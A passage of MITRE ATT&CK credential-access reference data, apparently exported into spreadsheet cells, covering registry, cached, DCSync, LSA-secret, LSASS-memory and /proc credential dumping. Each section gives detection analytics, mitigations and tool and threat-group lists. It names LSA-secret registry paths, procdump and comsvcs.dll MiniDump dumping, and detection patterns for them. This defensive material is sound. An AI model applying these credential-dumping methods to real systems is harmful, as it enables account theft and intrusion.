[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from the Registry.(Citation: SentinelLabs Agent Tesla Aug 2020) 
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can harvest credentials from local and remote host registries.(Citation: CrowdStrike IceApple May 2022)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) has several modules that search the Windows Registry for stored credentials: &lt;code&gt;Get-UnattendedInstallFile&lt;/code&gt;, &lt;code&gt;Get-Webconfig&lt;/code&gt;, &lt;code&gt;Get-ApplicationHost&lt;/code&gt;, &lt;code&gt;Get-SiteListPassword&lt;/code&gt;, &lt;code&gt;Get-CachedGPPPassword&lt;/code&gt;, and &lt;code&gt;Get-RegistryAutoLogon&lt;/code&gt;.(Citation: Pentestlab Stored Credentials)
Reg
[Reg](https://attack.mitre.org/software/S0075) may be used to find credentials in the Windows Registry.(Citation: Pentestlab Stored Credentials)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has retrieved PuTTY credentials by querying the &lt;code&gt;Software\SimonTatham\Putty\Sessions&lt;/code&gt; registry key (Citation: TrendMicro Trickbot Feb 2019)
Valak
[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.
Active Directory Configuration
Consider adding users to the "Protected Users" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)
Operating System Configuration
Consider limiting the number of cached credentials (HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon\cachedlogonscountvalue)(Citation: Tilbury Windows Credentials)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)
Cachedump
[Cachedump](https://attack.mitre.org/software/S0119) can extract cached password hashes from cache entry information.(Citation: Mandiant APT1)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Access
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)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Active Directory Configuration
Manage the access control list for "Replicating Directory Changes" and other permissions associated with domain controller replication.(Citation: ADSecurity Mimikatz DCSync)(Citation: Microsoft Replication ACL)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) performed domain replication.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002)'s DCSync to dump credentials from the memory of the targeted system.(Citation: FoxIT Wocao December 2019) 
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used privileged accounts to replicate directory service data with domain controllers.(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used a &lt;code&gt;DCSync&lt;/code&gt; command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used DCSync attacks to gather credentials for privilege escalation routines.(Citation: MSTIC DEV-0537 Mar 2022)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)(Citation: Cobalt Strike Manual 4.3 November 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may access to a host may attempt to access Local Security Authority (LSA) secrets. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Windows Registry Key Access
Monitor for the LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt; being accessed
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Tilbury Windows Credentials)
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used the `reg save` command to extract LSA secrets offline.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349) to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using gsecdump.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne.(Citation: Symantec Leafminer July 2018)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [LaZagne](https://attack.mitre.org/software/S0349) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used [gsecdump](https://attack.mitre.org/software/S0008) to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can dump secrets from the Local Security Authority.(Citation: AADInternals Documentation)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) collects LSA secrets.(Citation: F-Secure The Dukes)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)
IceApple
[IceApple](https://attack.mitre.org/software/S1022)'s Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\SECURITY\Policy\PolEKList\default`, `HKLM\SECURITY\Policy\Secrets\*\CurrVal`, and `HKLM\SECURITY\Policy\Secrets\*\OldVal`.(Citation: CrowdStrike IceApple May 2022)
Impacket
SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use Lazagne for harvesting credentials.(Citation: GitHub Pupy)
gsecdump
[gsecdump](https://attack.mitre.org/software/S0008) can dump LSA secrets.(Citation: TrueSec Gsecdump)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Note: Event ID 4104 from the “Microsoft-Windows-PowerShell/Operational” log captures Powershell script blocks, whose contents can be further analyzed to determine if they’re performing LSASS dumping.
Logon Session Creation
Monitor for newly constructed logon behavior from credentials being accessed by process memory of the LSASS. For example, detect behaviors of Secretsdump against a system, not being a Domain Controller. 
OS API Execution
Monitor for API calls that may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). OS API calls associated with LSASS process dumping include &lt;code&gt;OpenProcess&lt;/code&gt; and &lt;code&gt;MiniDumpWriteDump&lt;/code&gt;. Execution of these functions might trigger security log ids such as 4663 (Microsoft Security Auditing) and 10 (Microsoft Sysmon)
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls. Dynamic malware analysis tools (i.e., sandboxes) can be used to trace the execution, including OS API calls, for a single PE binary. 
Process Access
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Usage of Procdump and Windows Task Manager for LSASS dumping can also be detected via process creation events, since they both have a predictable set of command-line arguments (i.e., for specifying the process to be dumped). 
Note: Sysmon process access events (Event ID 10) can be extremely noisy, which necessitates tweaking the Sysmon configuration file. We recommend taking an approach analogous to that of the Sysmon Modular Configuration project (https://github.com/olafhartong/sysmon-modular) and filtering out any benign processes in your environment that produce large volumes of process access events. 
The GrantedAccess value in the below analytic for Mimikatz is meant to be used solely as an illustrative example of detecting Mimikatz LSASS access. However, actual GrantedAccess values change over time with different versions of Mimikatz and therefore detection engineers need to verify the accuracy of any GrantedAccess values that their analytics are using. 
&lt;h4&gt; Analytic 1 -  Mimikatz&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND granted_access == "0x1410") &lt;/code&gt;
&lt;h4&gt; Analytic 2 - Procdump &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND source_process == "*procdump.exe") &lt;/code&gt;
&lt;h4&gt;Analytic 3 - Windows Task Manager&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND source_process == "c:\windows\*\taskmgr.exe") &lt;/code&gt;
Process Creation
Monitor for newly executed processes that may be indicative of credential dumping. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Try monitoring for Sysmon Event ID 1 and/or Windows Security Event ID 4688 for process activity. 
Note: Rundll32/MiniDump has a different command-line syntax than that of Procdump, in that the process being dumped is specified via process ID instead of name (as with Procdump). Therefore, because the LSASS process ID is non-deterministic, the MiniDump detection isn’t specific to LSASS dumping and may need to be tuned to help reduce false positives.
&lt;h4&gt;Analytic 1 - Procdump&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "procdump*.exe" and command_line == "*lsass*")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - MiniDump via rundll32&lt;/h4&gt;
&lt;code&gt; processes = filter processes where ((event_id == "1" OR event_id == "4688") AND exe == "*rundll32.exe" and command_line == "*comsvcs.dll MiniDump*")&lt;/code&gt;
Windows Registry Key Modification
Monitor for changes to Registry entries associated with credential access that is stored in the process memory of the LSASS. For example, the adversary can modify the SAM and SYSTEM files.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing. (Citation: win10_asr)
Credential Access Protection
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. It also does not protect against all forms of credential dumping.(Citation: TechNet Credential Guard)(Citation: GitHub SHB Credential Guard)
Operating System Configuration
Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)
Password Policies
Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.
Privileged Process Integrity
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)
User Training
Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used [Mimikatz](https://attack.mitre.org/software/S0002) to capture and use legitimate credentials.(Citation: Dragos Crashoverride 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used ProcDump to dump credentials from memory.(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has been known to use credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) regularly deploys both publicly available (ex: [Mimikatz](https://attack.mitre.org/software/S0002)) and custom password retrieval tools on victims.(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018) They have also dumped the LSASS process memory using the MiniDump function.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument "dig."(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like [LaZagne](https://attack.mitre.org/software/S0349), [Mimikatz](https://attack.mitre.org/software/S0002), and ProcDump to dump credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.(Citation: FireEye APT39 Jan 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to harvest credentials through LSASS memory dumping.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools (such as Mimikatz and WCE) to perform credential dumping.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Mimikatz to retrieve credentials from LSASS memory.(Citation: RedCanary Mockingbird May 2020)
Cleaver
[Cleaver](https://attack.mitre.org/groups/G0003) has been known to dump credentials using Mimikatz and Windows Credential Editor.(Citation: Cylance Cleaver)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has obtained memory dumps with ProcDump to parse and extract credentials from a victim's LSASS process memory with [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used [Windows Credential Editor](https://attack.mitre.org/software/S0005) for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)	
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used prodump to dump credentials from LSASS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) along with a PowerShell-based [Mimikatz](https://attack.mitre.org/software/S0002) to dump credentials on the victim machines.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used &lt;code&gt;procdump&lt;/code&gt; to dump the LSASS process memory.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: Rapid7 HAFNIUM Mar 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) used [Cobalt Strike](https://attack.mitre.org/software/S0154) to carry out credential dumping using ProcDump.(Citation: Symantec WastedLocker June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has gathered credentials using [Mimikatz](https://attack.mitre.org/software/S0002) and ProcDump.(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used several tools for retrieving login and password information, including LaZagne and Mimikatz.(Citation: Symantec Leafminer July 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including ProcDump and WCE.(Citation: FireEye APT40 March 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has stolen domain credentials by dumping LSASS process memory using Task Manager, comsvcs.dll, and from a Microsoft Active Directory Domain Controller using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [Mimikatz](https://attack.mitre.org/software/S0002) and procdump64.exe.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used credential dumping tools such as [Mimikatz](https://attack.mitre.org/software/S0002) to steal credentials to accounts logged into the compromised system and to Outlook Web Access.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)(Citation: FireEye APT34 July 2019)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has used keyloggers that are also capable of dumping credentials.(Citation: Microsoft PLATINUM April 2016)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used its plainpwd tool, a modified version of [Mimikatz](https://attack.mitre.org/software/S0002), and comsvcs.dll to dump Windows credentials from system memory.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)(Citation: Microsoft Prestige ransomware October 2022)	
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used the Farse6.1 utility (based on [Mimikatz](https://attack.mitre.org/software/S0002)) to extract credentials from lsass.exe.(Citation: Group IB Silence Sept 2018)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used [Mimikatz](https://attack.mitre.org/software/S0002) and a custom tool, SecHack, to harvest credentials. (Citation: FireEye TRITON 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have used a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has attempted to access hashed credentials from the LSASS process memory space.(Citation: Microsoft Volt Typhoon May 2023)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has used [Mimikatz](https://attack.mitre.org/software/S0002) to obtain credentials.(Citation: Symantec Whitefly March 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has dumped the lsass.exe memory to harvest credentials with the use of open-source tool [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Mandiant FIN12 Oct 2021)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has used [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials from the victim's machine.(Citation: ESET Bad Rabbit)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn a job to inject into LSASS memory and dump password hashes.(Citation: Cobalt Strike Manual 4.3 November 2020)
CozyCar
[CozyCar](https://attack.mitre.org/software/S0046) has executed [Mimikatz](https://attack.mitre.org/software/S0002) to harvest stored credentials from the victim and further victim penetration.(Citation: F-Secure CozyDuke)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) leverages [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to steal credentials.(Citation: Symantec Tick Apr 2016)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed dropping password grabber modules including [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Trend Micro Emotet Jan 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: Github PowerShell Empire)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) has a module for [Mimikatz](https://attack.mitre.org/software/S0002) to collect Windows credentials from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)
Impacket
SecretsDump and [Mimikatz](https://attack.mitre.org/software/S0002) modules within [Impacket](https://attack.mitre.org/software/S0357) can perform credential dumping to obtain account and password information.(Citation: Impacket Tools)
LaZagne
[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can run [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) 
Lslsass
[Lslsass](https://attack.mitre.org/software/S0121) can dump active logon session password hashes from the lsass process.(Citation: Mandiant APT1)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can dump password hashes from `LSASS.exe`.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSASS Memory.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)
Net Crawler
[Net Crawler](https://attack.mitre.org/software/S0056) uses credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to extract cached credentials from Windows systems.(Citation: Cylance Cleaver)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) contains a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to help gather credentials that are later used for lateral movement.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: NCSC Joint Report Public Tools)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain credentials from LSASS, similar to [Mimikatz](https://attack.mitre.org/software/S0002). These credentials are used with [PsExec](https://attack.mitre.org/software/S0029) and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to help the malware propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: GitHub PoshC2)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can execute Lazagne as well as [Mimikatz](https://attack.mitre.org/software/S0002) using PowerShell.(Citation: GitHub Pupy)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) can perform OS credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: CERT-FR PYSA April 2020)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.(Citation: GitHub SILENTTRINITY Modules July 2019)
Windows Credential Editor
[Windows Credential Editor](https://attack.mitre.org/software/S0005) can dump credentials.(Citation: Amplia WCE)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;.
File Access
Monitor for unexpected access to passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\/maps&lt;/code&gt;, where the &lt;code&gt;\&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
Password Policies
Ensure that root accounts have complex, unique passwords across all systems on the network.
Privileged Account Management
Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing sensitive information.
LaZagne
